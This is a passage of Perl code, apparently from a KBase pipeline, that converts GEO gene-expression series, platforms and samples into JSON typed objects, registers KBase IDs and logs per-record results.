# 3) directory of geo_results (running list of files storing ids and results of geo objects)
# 4) directory where to write the workspace typed objects in json format
#returns a "1" if successful or a "0 - error_string" if failed
#This does checking for existing Platform, Samples and Series being created by looking in the contents
#of the platforms, samples and series files located in $geo_results_directory (arg3)
#The typed objects will be stored in json format in $typed_objects_directory (arg4)
my $self = shift;
my $gse_object_file = shift;
my $data_source = shift;
my $geo_results_directory = shift;
my $typed_objects_directory = shift;
open (JSON_FILE,$gse_object_file) or die "0 - Unable to open $gse_object_file , it was supposed to exist";
my ($json_result,@temp_array)= (<JSON_FILE>);
close(JSON_FILE);
if ($json_result eq "{}")
{
return "0 - GSE OBJECT FILE : ".$gse_object_file." was an empty hash";
}
my $gse_object_ref = from_json($json_result);
my $gse_results_file = $geo_results_directory."/gse_results";
my $gpl_results_file = $geo_results_directory."/gpl_results";
my $gsm_results_file = $geo_results_directory."/gsm_results";
my $id_server = Bio::KBase::IDServer::Client->new("http://kbase.us/services/idserver");
my %processed_gse_hash = get_processed_gse_hash($gse_results_file); #returns a hash key gse_id => {"id" => kb|series.#,
# "result" => result}
my %processed_gpl_hash = get_processed_gpl_hash($gpl_results_file); #returns a hash key gpl_id => value kb|platform.#
my %processed_gsm_hash = get_processed_gsm_hash($gsm_results_file);
#returns a hash key gsm_id => {genome => {data_quality_level => value kb|sample.#
my $current_gse_id = $gse_object_ref->{'gseID'};
my %sample_ids_already_in_series;
if(exists($processed_gse_hash{$current_gse_id}{"sample_ids"}))
{
my @sample_ids_array = split("\s*,\s*",$processed_gse_hash{$current_gse_id}{"sample_ids"});
foreach my $sample_id (@sample_ids_array)
{
$sample_ids_already_in_series{$sample_id} = 1;
}
}
else
{
delete($processed_gse_hash{$current_gse_id});
}
#check if GSE has errors
my @gse_errors = @{$gse_object_ref->{'gseErrors'}};
if (scalar(@gse_errors) > 0)
{
if ((exists($processed_gse_hash{$current_gse_id})))
{
return "1";
}
else
{
delete($processed_gse_hash{$current_gse_id});
}
#write out gse record result
open (GSE_RESULTS_FILE, ">>".$gse_results_file) or return "0 - Unable to make/append to $gse_results_file \n";
#the first column is the GSE_ID
#the second column is the KBase Series ID (if it exists)
#the third column is the upload result (3 possible values "Full Success","Partial Success"(some of GSMs passed, but not all),"Failure"
#the fourth column is the warning and error messages (separated by "___", 3 underscores)
#the fifth column is comma separated list of ids for the samples that the series contains.
#GRAB ERRORS REMOVE "\n", concatenate with 3 underscores
my $gse_error_message = join("___",@gse_errors);
$gse_error_message =~ s/\n/ /g;
print GSE_RESULTS_FILE $current_gse_id . "\t\tFailure\t" . $gse_error_message . "\t\n";
close(GSE_RESULTS_FAIL);
#loop through each GSM and write out gsm record result
open (GSM_RESULTS_FILE, ">>".$gsm_results_file) or return "0 - Unable to make/append to $gsm_results_file \n";
my @gsm_ids = keys(%{$gse_object_ref->{'gseSamples'}});
foreach my $gsm_id (@gsm_ids)
{
#the first column is the GSM_ID
#the second column is the Genome (kbase genome id)
#the third column is the DataQualityLevel (currently 3 possible int values -
# "1" for kbase pipeline processed data, "2" for seq blat mapped geo data, "3" for synonym mapped geo data
#the fourth column is the KBase Sample ID (if it exists)
#the fifth column is the warning and error messages (separated by "___", 3 underscores)
my @genome_list;
if (scalar(keys(%{$gse_object_ref->{'gseSamples'}->{$gsm_id}->{'gsmPlatform'}->{'genomesMappingMethod'}})) == 0)
{
@genome_list = ('');
}
else
{
@genome_list = keys(%{$gse_object_ref->{'gseSamples'}->{$gsm_id}->{'gsmPlatform'}->{'genomesMappingMethod'}});
}
my $gsm_error_message = join("___",@{$gse_object_ref->{'gseSamples'}->{$gsm_id}->{'errors'}});
$gsm_error_message =~ s/\n/ /g;
foreach my $genome_id (@genome_list)
{
print GSM_RESULTS_FILE $gsm_id . "\t".$genome_id."\t\t\t".$gsm_error_message."\n";
}
}
close(GSM_RESULTS_FILE);
return "1";
}
else
{
#PROCESS PLATFORMS
#the GSE passed and at least 1 gsm passed
my %gpl_object_hash; #key = gpl_id, value = platform typedef structure { id => val,
# source_id => val,
# genome_id => val,
# technology => val,
# title => val,
# strain => {genome_id=>val,
# reference_strain => val (Y or N),
# wild_type => val (Y or N),
# description => val,
# name => val}}
my @gsm_ids = keys(%{$gse_object_ref->{'gseSamples'}});
my $dbh = DBI->connect('DBI:mysql:'.$self->{dbName}.':'.$self->{dbhost}, $self->{dbUser}, $self->{dbPwd},
{ RaiseError => 1, ShowErrorStatement => 1 }
);
my $passing_gsm_count = 0;
my $failing_gsm_count = 0;
#check each passing GSM and grab the platform build up unique platform objects (see if they already exist)
foreach my $gsm_id (@gsm_ids)
{
if (scalar(@{$gse_object_ref->{'gseSamples'}->{$gsm_id}->{'errors'}}) == 0)
{
my %gpl_hash = %{$gse_object_ref->{'gseSamples'}->{$gsm_id}->{'gsmPlatform'}};
my $gpl_id = $gpl_hash{'gplID'};
#check if it has been processed in previous runs
unless(exists($processed_gpl_hash{$gpl_id}))
{
#check if gpl has been encountered in file before
unless(exists($gpl_object_hash{$gpl_id}))
{
#Build up the platform object
#Grab genomes based on scientific_name and tax_id (which one to select?)
my $ncbi_db = Bio::DB::Taxonomy->new(-source=>"entrez");
my $ncbi_taxon = $ncbi_db->get_taxon(-taxonid=>$gpl_hash{'gplTaxID'});
my @ncbi_scientific_names = @{$ncbi_taxon->{'_names_hash'}->{'scientific'}};
# my $get_genome_ids_q = "select id from Genome where scientific_name in (".
# join(",", ("?") x @ncbi_scientific_names) . ") ";
my $get_genome_ids_q = "select distinct g.id from Genome g left outer join ".
"IsTaxonomyOf it on it.to_link = g.id left outer join ".
"TaxonomicGrouping tg on tg.id = it.from_link ".
"where (tg.scientific_name in (".
join(",", ("?") x @ncbi_scientific_names) . ") and it.confidence >= 2) ".
"or g.scientific_name in (".
join(",", ("?") x @ncbi_scientific_names) . ") ";
my $get_genome_ids_qh = $dbh->prepare($get_genome_ids_q) or return "0 - Unable to prepare get_genome_ids_q : $get_genome_ids_q ".
$dbh->errstr();
$get_genome_ids_qh->execute(@ncbi_scientific_names,@ncbi_scientific_names) or return "0 - Unable to execute get_genome_ids_q : $get_genome_ids_q " .
$get_genome_ids_qh->errstr();
my $genome_id_selected = '';
my %genome_ids_hash;
while (my ($genome_id) = $get_genome_ids_qh->fetchrow_array())
{
$genome_ids_hash{$genome_id} = 1;
}
my %genomes_map_results = %{$gpl_hash{'genomesMappingMethod'}};
foreach my $genome_id (sort(keys(%genomes_map_results)))
{
#will preferentially choose a mapped genome assuming the genome maps to the Platform tax ID.
if ($genome_id_selected eq '')
{
if (($genomes_map_results{$genome_id} ne "UNABLE TO MAP PROBES BY SEQUENCE OR EXTERNAL IDS") &&
($genome_ids_hash{$genome_id} == 1))
{
$genome_id_selected = $genome_id;
}
}
}
if ($genome_id_selected eq '')
{
if (scalar(keys(%genome_ids_hash)) > 0)
{
#if mapped genome does not match GPL genome ids, Will select first (sorted) GPL genome id.
my @genome_keys = sort(keys(%genome_ids_hash));
$genome_id_selected = $genome_keys[0];
}
else
{
foreach my $genome_id (sort(keys(%genomes_map_results)))
{
if ($genomes_map_results{$genome_id} ne "UNABLE TO MAP PROBES BY SEQUENCE OR EXTERNAL IDS")
{
$genome_id_selected = $genome_id;
}
}
}
}
if ($genome_id_selected eq '')
{
#should not be possible to reach this as at least one gsm genome should
#have been able to be mapped to have a gse w/o errrors
open (GSE_RESULTS_FILE, ">>".$gse_results_file) or return "0 - Unable to make/append to $gse_results_file \n";
print GSE_RESULTS_FILE $current_gse_id . "\t\tFailure\tUnable to find a tax id mapping for platform. Should not be able to reach this error.\t\n";
close(GSE_RESULTS_FAIL);
return 1;
}
#grab kbase_platform_id for it
#Next two lines for testing
# my $platform_prefix = "kb|platform_test"; #if want to test it do it for sample and series as well. Then comment out next line.
# my $kb_gpl_id = $platform_prefix .".".$id_server->allocate_id_range( $platform_prefix, 1 );
#Next three lines for real
my $platform_prefix = "kb|platform";
my $temp_id_hash_ref;
my $id_counter_try = 0;
while (! defined $temp_id_hash_ref)
{
eval {
$temp_id_hash_ref = $id_server->register_ids($platform_prefix,"GEO",[$gpl_id]);
};
if ($@)
{
my $msg = $@;
if ($id_counter_try < 20 && $msg =~ /500\s+Internal\s+Server\s+Error/i)
{
print "Retrying ID server call.\n";
$id_counter_try++;
sleep 1;
}
else
{
print "ID server error ($id_counter_try retries): $msg\n";
print "ID server call: $platform_prefix, GEO , $gpl_id \n";
die "ID server failed.";
}
}
}
my $kb_gpl_id = $temp_id_hash_ref->{$gpl_id};
$gpl_object_hash{$gpl_id}={"id" =>$kb_gpl_id,
"source_id" => $gpl_id,
"genome_id" => $genome_id_selected,
"technology" => $gpl_hash{"gplTechnology"},
"title" => $gpl_hash{"gplTitle"},
"strain" => {"genome_id" => $genome_id_selected,
"reference_strain" => "Y",
"wild_type" => "Y",
"description" => "$genome_id_selected wild_type reference strain",
"name" => "$genome_id_selected wild_type reference strain"}};
}
}
}
}
#print "\n\nGPL OBJECT HASH : ".Dumper(\%gpl_object_hash)."\n\n";
if (scalar(keys(%gpl_object_hash)) > 0)
{
open (GPL_RESULTS_FILE, ">>".$gpl_results_file) or return "0 - Unable to make/append to $gpl_results_file \n";
foreach my $gpl_id (keys(%gpl_object_hash))
{
#add it to the %processed_gpl_hash (used later for looking up kb_platform_ids for building the GSM)
$processed_gpl_hash{$gpl_id} = $gpl_object_hash{$gpl_id}{"id"};
#write the GPL info in the file
print GPL_RESULTS_FILE $gpl_id . "\t".$gpl_object_hash{$gpl_id}{"id"}."\n";
#CREATE JSON OBJECT FILE
my $temp_platform_file_name = $gpl_object_hash{$gpl_id}{"id"};
$temp_platform_file_name =~ s/kb\|//;
my $platform_file_name = $typed_objects_directory."/".$temp_platform_file_name;
open(PLATFORM_FILE, ">".$platform_file_name) or return "0 - Unable to make to $platform_file_name \n";
print PLATFORM_FILE to_json($gpl_object_hash{$gpl_id});
close(PLATFORM_FILE);
}
close (GPL_RESULTS_FILE);
}
#PROCESS SAMPLES
#get sample kbase IDS for later use in the series Objects
my @sample_id_array; #array of Sample Kbase IDs associated with the Series (could be both new and old GSMs)
my @new_sample_id_array; #Array of new id of new GSMs to be added. : new gsm = distinct (GSM - Genome - DataQualityLevel combination).
#If at least one new one and the GSE already exist, need to save a new verion of the GSE
#(extra entries in the sample list)
open (GSM_RESULTS_FILE, ">>".$gsm_results_file) or return "0 - Unable to make/append to $gsm_results_file \n";
#the first column is the GSM_ID
#the second column is the Genome (kbase genome id)
#the third column is the DataQualityLevel (currently 3 possible int values -
# "1" for kbase pipeline processed data, "2" for seq blat mapped geo data, "3" for synonym mapped geo data
#the fourth column is the KBase Sample ID (if it exists)
#the fifth column is the warning and error messages (separated by "___", 3 underscores)
#loop through all passing GSMs and build up sample objects (see if they already exist)
my @gsm_ids = keys(%{$gse_object_ref->{'gseSamples'}});
foreach my $gsm_id (@gsm_ids)
{
if (scalar(@{$gse_object_ref->{'gseSamples'}->{$gsm_id}->{'errors'}}) == 0)
{
#grab shared sample object data
my $gsm_type = "microarray";
# my $gsm_numerical_interpretation = "Log2 level intensities";
my $gsm_numerical_interpretation;
if(exists($gse_object_ref->{'gseSamples'}->{$gsm_id}->{'numerical_interpretation'}) &&
(trim($gse_object_ref->{'gseSamples'}->{$gsm_id}->{'numerical_interpretation'}) ne ""))
{
$gsm_numerical_interpretation = $gse_object_ref->{'gseSamples'}->{$gsm_id}->{'numerical_interpretation'};
}
my $gsm_description = "";
if(exists($gse_object_ref->{'gseSamples'}->{$gsm_id}->{'gsmDescription'}) &&
(trim($gse_object_ref->{'gseSamples'}->{$gsm_id}->{'gsmDescription'}) ne ""))
{
$gsm_description = $gse_object_ref->{'gseSamples'}->{$gsm_id}->{'gsmDescription'};
}
$gsm_description .= "::Value Description : ".$gse_object_ref->{'gseSamples'}->{$gsm_id}->{"gsmValueType"};
my $gsm_title = $gse_object_ref->{'gseSamples'}->{$gsm_id}->{'gsmTitle'};
my $gsm_external_source_date = $gse_object_ref->{'gseSamples'}->{$gsm_id}->{'gsmSubmissionDate'};
my $RMA_normalized = 0;
if (exists($gse_object_ref->{'gseSamples'}->{$gsm_id}->{'rmaNormalized'}) &&
($gse_object_ref->{'gseSamples'}->{$gsm_id}->{'rmaNormalized'} ne ""))
{
if ($gse_object_ref->{'gseSamples'}->{$gsm_id}->{'rmaNormalized'} eq "1")
{
$RMA_normalized = 1;
}
else
{
$RMA_normalized = 0;
}
}
my $gsm_molecule = "";
if (exists($gse_object_ref->{'gseSamples'}->{$gsm_id}->{'gsmMolecule'}) &&
($gse_object_ref->{'gseSamples'}->{$gsm_id}->{'gsmMolecule'} ne ""))
{
$gsm_molecule = $gse_object_ref->{'gseSamples'}->{$gsm_id}->{'gsmMolecule'};
}
my $gsm_data_source = $data_source;
my $gsm_platform_id = $processed_gpl_hash{$gse_object_ref->{'gseSamples'}->{$gsm_id}->{'gsmPlatform'}->{'gplID'}};
#Protocol
my $gsm_protocol = "";
if ((exists($gse_object_ref->{'gseSamples'}->{$gsm_id}->{'gsmProtocol'})) &&
($gse_object_ref->{'gseSamples'}->{$gsm_id}->{'gsmProtocol'} ne ""))
{
my $gsm_protocol_name = $gsm_id . " protocol";
$gsm_protocol = {"name"=>$gsm_protocol_name,
"description"=>$gse_object_ref->{'gseSamples'}->{$gsm_id}->{'gsmProtocol'}};
}
#Characteristics
my $gsm_characteristics = "";
my @gsm_characteristics_list = @{$gse_object_ref->{'gseSamples'}->{$gsm_id}->{'gsmSampleCharacteristics'}};
if (scalar(@gsm_characteristics_list) > 0)
{
$gsm_characteristics = join(":: ",@gsm_characteristics_list);
}
#Persons
my @persons;
foreach my $person_email (keys(%{$gse_object_ref->{'gseSamples'}->{$gsm_id}->{'contactPeople'}}))
{
if ($person_email ne "")
{
my $first_name = $gse_object_ref->{'gseSamples'}->{$gsm_id}->{'contactPeople'}->{$person_email}->{'contactFirstName'};
if (!(defined($first_name)) || ($first_name eq ""))
{
$first_name = "unknown";
}
my $last_name = $gse_object_ref->{'gseSamples'}->{$gsm_id}->{'contactPeople'}->{$person_email}->{'contactLastName'};
if (!(defined($last_name)) || ($last_name eq ""))
{
$last_name = "unknown";
}
my $institution = $gse_object_ref->{'gseSamples'}->{$gsm_id}->{'contactPeople'}->{$person_email}->{'contactInstitution'};
if (!(defined($institution)) || ($institution eq ""))
{
$institution = "unknown";
}
push(@persons,{"email" => $person_email,
"first_name" => $first_name,
"last_name" => $last_name,
"institution" => $institution});
}
}
#NEED TO GRAB OTHER ONTOLOGY TERM INFO FROM THE DATABASE.
my @expression_ontology_terms;
my @ontology_term_ids = @{$gse_object_ref->{'gseSamples'}->{$gsm_id}->{'gsmOntologies'}};
#print "\n\nONTOLOGY TERM IDS : ". join(":",@ontology_term_ids) ;
if (scalar(@ontology_term_ids > 0))
{
my $get_ontology_info_q = "select id, name, definition from Ontology where id in (".
join(",", ("?") x @ontology_term_ids) . ") ";
my $get_ontology_info_qh = $dbh->prepare($get_ontology_info_q) or return "0 - Unable to prepare get_ontology_info_q : $get_ontology_info_q ".
$dbh->errstr();
$get_ontology_info_qh->execute(@ontology_term_ids) or die "UNABLE TO EXECUTE ONTS ".
#return "0 -
"Unable to execute get_ontology_info_q : $get_ontology_info_q ".
$get_ontology_info_qh->errstr();
while(my ($temp_term_id, $temp_term_name, $temp_term_definition) = $get_ontology_info_qh->fetchrow_array())
{
push(@expression_ontology_terms,{'expression_ontology_term_id'=>$temp_term_id,
'expression_ontology_term_name'=>$temp_term_name,
'expression_ontology_term_definition'=>$temp_term_definition});
}
}
#genome specific data : id, genome_id, expression_levels, original_median, data_quality_level, strain (all of strain)
#loop through each passing GENOME
my @genome_ids = keys(%{$gse_object_ref->{'gseSamples'}->{$gsm_id}->{'gsmData'}});
foreach my $temp_genome_id (@genome_ids)
{
my $dataQualityLevel = $gse_object_ref->{'gseSamples'}->{$gsm_id}->{'gsmData'}->{$temp_genome_id}->{'dataQualityLevel'};
my $gsm_processing_comments = "";
my $temp_kbase_id = "";
if(exists($processed_gsm_hash{$gsm_id}{$temp_genome_id}{$dataQualityLevel}))
{
$temp_kbase_id = $processed_gsm_hash{$gsm_id}{$temp_genome_id}{$dataQualityLevel};
}
my $gsm_processing_comments = "";
if (exists($gse_object_ref->{'gseSamples'}->{$gsm_id}->{'gsmData'}->{$temp_genome_id}->{'processing_comments'}) &&
($gse_object_ref->{'gseSamples'}->{$gsm_id}->{'gsmData'}->{$temp_genome_id}->{'processing_comments'} ne ""))
{
$gsm_processing_comments = $gse_object_ref->{'gseSamples'}->{$gsm_id}->{'gsmData'}->{$temp_genome_id}->{'processing_comments'};
}
if($temp_kbase_id ne "")
{
#means the sample already exists just need to add the sample kbase_id to the list of samples for the
push(@sample_id_array,$temp_kbase_id);
unless (exists($sample_ids_already_in_series{$temp_kbase_id}))
{
push(@new_sample_id_array,$temp_kbase_id);
}
$passing_gsm_count++;
}
elsif (scalar(@{$gse_object_ref->{'gseSamples'}->{$gsm_id}->{'gsmData'}->{$temp_genome_id}->{'errors'}}) > 0)
{
#DO NOTHING as the GSM and genome combination has an error. No sample gets made.
}
else
{
#we have a new GSM-Genome-DQL combination ( will be made into a new sample object)
my %expression_levels_hash;
my %temp_levels_hash = %{$gse_object_ref->{'gseSamples'}->{$gsm_id}->{'gsmData'}->{$temp_genome_id}->{'features'}};
foreach my $temp_feature_id (keys(%temp_levels_hash))
{
$expression_levels_hash{$temp_feature_id} = $temp_levels_hash{$temp_feature_id}->{'mean'};
}
my $original_log2_median;
unless(exists($gse_object_ref->{'gseSamples'}->{$gsm_id}->{'gsmData'}->{$temp_genome_id}->{'originalLog2Median'}))
{
my @temp_level_keys = sort { $expression_levels_hash{$a} <=> $expression_levels_hash{$b} } keys(%expression_levels_hash);
my $num_measurements = scalar(@temp_level_keys);
if (($num_measurements%2) == 0)
{
$original_log2_median = ($expression_levels_hash{$temp_level_keys[(($num_measurements/2)-1)]} +
$expression_levels_hash{$temp_level_keys[($num_measurements/2)]})/2;
}
else
{
$original_log2_median = $expression_levels_hash{$temp_level_keys[(floor($num_measurements/2))]};
}
foreach my $feature_id (@temp_level_keys)
{
$expression_levels_hash{$feature_id} = $expression_levels_hash{$feature_id} - $original_log2_median;
}
}
else
{
$original_log2_median = $gse_object_ref->{'gseSamples'}->{$gsm_id}->{'gsmData'}->{$temp_genome_id}->{'originalLog2Median'};
}
#within sample loop
#grab kbase_sample_id for it
#Next two lines for testing
# my $sample_prefix = "kb|sample_test";
# my $sample_kb_id = $sample_prefix .".".$id_server->allocate_id_range( $sample_prefix, 1 );
#Next four lines for real
my $sample_prefix = "kb|sample";#
my $sample_id_key = "GEO::".$gsm_id."::".$temp_genome_id."::".$dataQualityLevel;
my $temp_id_hash_ref;
my $id_counter_try = 0;
while (! defined $temp_id_hash_ref)
{
eval
{
$temp_id_hash_ref = $id_server->register_ids($sample_prefix,"GEO",[$sample_id_key]);
};
if ($@)
{
my $msg = $@;
if ($id_counter_try < 20 && $msg =~ /500\s+Internal\s+Server\s+Error/i)
{
print "Retrying ID server call.\n";
$id_counter_try++;
sleep 1;
}
else
{
print "ID server error ($id_counter_try retries): $msg\n";
print "ID server call: $sample_prefix, GEO $sample_id_key \n ";
die "ID server failed.";
}
}
}
my $sample_kb_id = $temp_id_hash_ref->{$sample_id_key};
#add sample_kb_id to gse_list
push(@sample_id_array,$sample_kb_id);
#new sample - push id onto new_sample_id_array;
push(@new_sample_id_array,$sample_kb_id);
$passing_gsm_count++;
#write out the samples in the processed_gsm_file
my $gsm_warning_message = "";
if (exists($gse_object_ref->{'gseSamples'}->{$gsm_id}->{'warnings'}))
{
$gsm_warning_message = join("___",@{$gse_object_ref->{'gseSamples'}->{$gsm_id}->{'warnings'}});
$gsm_warning_message =~ s/\n/ /g;
}
print GSM_RESULTS_FILE $gsm_id . "\t".$temp_genome_id."\t".$dataQualityLevel."\t".$sample_kb_id."\t".$gsm_warning_message."\n";
#BUILD UP FULL SAMPLE OBJECT
#note "default_control_sample"
# and "averaged_from_samples" are not set by this (those are custom fields that require users to set that data)
$dataQualityLevel = $dataQualityLevel + 0;#To coerce back to an integer
my $sample_object_ref = {"id" =>$sample_kb_id,
"source_id" => $sample_id_key . "___" . $gsm_id,
"type"=>$gsm_type,
"numerical_interpretation"=>$gsm_numerical_interpretation,
"title"=>$gsm_title,
"data_quality_level"=>$dataQualityLevel,
"original_median"=>$original_log2_median,
"external_source_date"=>$gsm_external_source_date,
"expression_levels"=>\%expression_levels_hash,
"genome_id" => $temp_genome_id,
"platform_id"=>$gsm_platform_id,
"strain"=>{"genome_id" => $temp_genome_id,
"reference_strain" => "Y",
"wild_type" => "Y",
"description" => "$temp_genome_id wild_type reference strain",
"name" => "$temp_genome_id wild_type reference strain"},
"data_source"=>$gsm_data_source,
"RMA_normalized"=>$RMA_normalized,
};
if (scalar(@expression_ontology_terms) > 0)
{
#print "\nHAVE ONTOLOGY TERMS:\n";
$sample_object_ref->{"expression_ontology_terms"}=\@expression_ontology_terms;
}
if ($gsm_protocol)
{
$sample_object_ref->{"protocol"}=$gsm_protocol;
}
if ($gsm_description)
{
$sample_object_ref->{"description"}=$gsm_description;
}
if ($gsm_molecule)
{
$sample_object_ref->{"molecule"}=$gsm_molecule;
}
if (scalar(@persons) > 0)
{
$sample_object_ref->{"persons"}=\@persons;
}
if ($gsm_processing_comments)
{
$sample_object_ref->{"processing_comments"}=$gsm_processing_comments;
}
if ($gsm_characteristics)
{
$sample_object_ref->{"characteristics"}=$gsm_characteristics;
}
#Write out object
#CREATE JSON OBJECT FILE
my $temp_sample_file_name = $sample_kb_id;
$temp_sample_file_name =~ s/kb\|//;
my $sample_file_name = $typed_objects_directory."/".$temp_sample_file_name;
open(SAMPLE_FILE, ">".$sample_file_name) or return "0 - Unable to make to $sample_file_name \n";
print SAMPLE_FILE to_json($sample_object_ref);
close(SAMPLE_FILE);
}
}
}
else
{
#GSM HAS A ERROR ADD TO FILE
my @genome_list;
if (scalar(keys(%{$gse_object_ref->{'gseSamples'}->{$gsm_id}->{'gsmPlatform'}->{'genomesMappingMethod'}})) == 0)
{
@genome_list = ('');
}
else
{
@genome_list = keys(%{$gse_object_ref->{'gseSamples'}->{$gsm_id}->{'gsmPlatform'}->{'genomesMappingMethod'}});
}
my $gsm_error_message = join("___",@{$gse_object_ref->{'gseSamples'}->{$gsm_id}->{'errors'}});
$gsm_error_message =~ s/\n/ /g;
$failing_gsm_count++;
foreach my $genome_id (@genome_list)
{
print GSM_RESULTS_FILE $gsm_id . "\t".$genome_id."\t\t\t".$gsm_error_message."\n";
}
}
}
close(GSM_RESULTS_FILE);
my %sample_genome_hash = create_sample_genome_hash($gsm_results_file);
#PROCESS SERIES (IF new SERIES, or existing SERIES but need to add new samples to the list (NEED TO STORE sample_id_list)).
#NOTE IF SERIES EXISTS ALREADY NEED TO SLURP UP ENTIRE GSE_RESULTS_FILE AND CHANGE THAT GSE ENTRY
#(TO INCLUDE THE NEW SAMPLE_IDS)(CAN GET SAMPLE_IDS_THEN)
#grab series data, write it to file, build up return typed object
#check to see if it exists all ready. If it does, get the id for it and the list of SampleIDs associated with it.
#if it does not get new id.
my $series_id;
my %sample_ids_in_series;#key kb_sample_id => genome_id
foreach my $temp_kb_sample_id (@sample_id_array)
{
$sample_ids_in_series{$temp_kb_sample_id}=$sample_genome_hash{$temp_kb_sample_id};
}
if (exists($processed_gse_hash{$current_gse_id}{"id"}))
{
#means the GSE exists but new sample_ids need to be added to it.
#need to make the full SERIES typed object again using existing id
#merged set between @sample_id_array and %sample_ids_already_in_series
$series_id = $processed_gse_hash{$current_gse_id}{"id"};
#print "\nIN IF : Existing series\n";
foreach my $temp_kb_sample_id (keys(%sample_ids_already_in_series))
{
$sample_ids_in_series{$temp_kb_sample_id}=$sample_genome_hash{$temp_kb_sample_id};
}
#need to change geo results file and overwrite the previous entry (new list of sample_ids)
if ($passing_gsm_count == 0)
{
return "0 - $current_gse_id had no passing GSMs, but should not have reached this error \n";
}
my $result = $processed_gse_hash{$current_gse_id}{"result"};
if (($result eq "Full Success") && ($failing_gsm_count > 0))
{
$result = "Partial Success";
}
my @gse_warnings = @{$gse_object_ref->{'gseWarnings'}};
my $warning_messages = join("___",@gse_warnings);
my @gse_results_lines;
if (-e $gse_results_file)
{
open (GSE_RESULTS,$gse_results_file) or return "0 - Unable to open $gse_results_file , it was supposed to exist";
@gse_results_lines = (<GSE_RESULTS>);
close (GSE_RESULTS);
}
open (GSE_RESULTS_FILE, ">".$gse_results_file) or return "0 - Unable to make to $gse_results_file \n";
my $old_messages = "";
foreach my $gse_result_line (@gse_results_lines)
{
my ($gse_id,$kbase_id,$result,$messages,$sample_ids) = split('\t',trim($gse_result_line));
if ($current_gse_id ne $gse_id)
{
print GSE_RESULTS_FILE $gse_result_line;
}
else
{
$old_messages = $messages;
}
}
#add new version of series to the results file.
if ($old_messages)
{
if ($warning_messages)
{
$warning_messages .= "___" . $old_messages;
}
else
{
$warning_messages = $old_messages;
}
}
print GSE_RESULTS_FILE $current_gse_id . "\t" . $series_id . "\t".$result."\t".$warning_messages."\t".
join(",",sort(keys(%sample_ids_in_series)))."\n";
close (GSE_RESULTS_FILE);
}
else
{
#means brand new series and can append to series geo results file.
#GRAB NEW SERIES KB ID
#print "\nIN ELSE : Brand new series\n";
#Next two lines for testing
# my $series_prefix = "kb|series_test";
# $series_id = $series_prefix .".".$id_server->allocate_id_range( $series_prefix, 1 );
#Next three lines for real
my $series_prefix = "kb|series";
my $temp_id_hash_ref;
my $id_counter_try = 0;
while (! defined $temp_id_hash_ref)
{
eval
{
$temp_id_hash_ref = $id_server->register_ids($series_prefix,"GEO",[$gse_object_ref->{'gseID'}]);
};
if ($@)
{
my $msg = $@;
if ($id_counter_try < 20 && $msg =~ /500\s+Internal\s+Server\s+Error/i)
{
print "Retrying ID server call.\n";
$id_counter_try++;
sleep 1;
}
else
{
print "ID server error ($id_counter_try retries): $msg\n";
print "ID server call: $series_prefix, GEO, ".$gse_object_ref->{'gseID'}." \n ";
die "ID server failed.";
}
}
}
$series_id = $temp_id_hash_ref->{$gse_object_ref->{'gseID'}};
#resolve result
my $result = "Full Success";
if ($passing_gsm_count == 0)
{
return "0 - $current_gse_id had no passing GSMs, but should not have reached this error \n";
}
if ($failing_gsm_count > 0)
{
$result = "Partial Success";
}
my @gse_warnings = @{$gse_object_ref->{'gseWarnings'}};
my $warning_messages = join("___",@gse_warnings);
open (GSE_RESULTS_FILE, ">>".$gse_results_file) or return "0 - Unable to make/append to $gse_results_file \n";
print GSE_RESULTS_FILE $current_gse_id . "\t" . $series_id . "\t".$result."\t".$warning_messages."\t".
join(",",sort(keys(%sample_ids_in_series)))."\n";
close (GSE_RESULTS_FILE);
}
my @gse_sample_ids = sort(keys(%sample_ids_in_series));
my %genome_sample_ids_hash; #key genome id =>[sample_ids]
foreach my $temp_sample_id (sort(keys(%sample_ids_in_series)))
{
push(@{$genome_sample_ids_hash{$sample_ids_in_series{$temp_sample_id}}},$temp_sample_id);
}
#BUILD UP SERIES OBJECT and WRITE OUT SERIES OBJECT
my $series_object_ref = {"id"=>$series_id,
"source_id"=>$gse_object_ref->{'gseID'},
"genome_expression_sample_ids_map"=>\%genome_sample_ids_hash,
"external_source_date"=>$gse_object_ref->{'gseSubmissionDate'}};
if (exists($gse_object_ref->{'gseTitle'}) && ($gse_object_ref->{'gseTitle'} ne ""))
{
$series_object_ref->{"title"} = $gse_object_ref->{'gseTitle'};
}
if (exists($gse_object_ref->{'gseDesign'}) && ($gse_object_ref->{'gseDesign'} ne ""))
{
$series_object_ref->{"design"} = $gse_object_ref->{'gseDesign'};
}
if (exists($gse_object_ref->{'gsePubMedID'}) && ($gse_object_ref->{'gsePubMedID'} ne ""))
{
$series_object_ref->{"publication_id"} = $gse_object_ref->{'gsePubMedID'};
}
if (exists($gse_object_ref->{'gseSummary'}) && ($gse_object_ref->{'gseSummary'} ne ""))
{
$series_object_ref->{"summary"} = $gse_object_ref->{'gseSummary'};
}
foreach my $temp_sample_id (sort(keys(%sample_ids_in_series)))
{
add_series_ids_to_samples($typed_objects_directory,$temp_sample_id,$series_id);
}
#Write out object
#CREATE JSON OBJECT FILE
my $temp_series_file_name = $series_id;
$temp_series_file_name =~ s/kb\|//;
my $series_file_name = $typed_objects_directory."/".$temp_series_file_name;
open(SERIES_FILE, ">".$series_file_name) or return "0 - Unable to make to $series_file_name \n";
print SERIES_FILE to_json($series_object_ref);
close(SERIES_FILE);
}
return "1";
}
sub get_processed_gse_hash
{
my $gse_results_file = shift;
#returns a hash key gse_id => value kb|series.#
my %return_hash;
if (-e $gse_results_file)
{
#THIS FILE HAS 5 columns (tab delimited)(only 3 are brought back for this hash)
#the first column is the GSE_ID
#the second column is the KBase Series ID (if it exists)
#the third column is the upload result (3 possible values "Full Success","Partial Success"(some of GSMs passed, but not all),"Failure"
#the fourth column is the warning and error messages (separated by "___", 3 underscores)
#the fifth column is comma separated list of ids for the samples that the series contains.
open (GSE_RESULTS,$gse_results_file) or return "0 - Unable to open $gse_results_file , it was supposed to exist";
my @gse_results_lines = (<GSE_RESULTS>);
foreach my $gse_result_line (@gse_results_lines)
{
my ($gse_id,$kbase_id,$result,$messages,$sample_ids) = split('\t',trim($gse_result_line));
if (($result ne "Failure") && (trim($kbase_id) ne '') && (trim($gse_id) ne ''))
{
$return_hash{$gse_id}{"id"} = trim($kbase_id);
}
$return_hash{$gse_id}{"result"} = trim($result);
$return_hash{$gse_id}{"sample_ids"} = trim($sample_ids);
}
close(GSE_RESULTS);
}
return %return_hash;
}
sub get_processed_gpl_hash
{
my $gpl_results_file = shift;
#returns a hash key gpl_id => value kb|platform.#
my %return_hash;
if (-e $gpl_results_file)
{
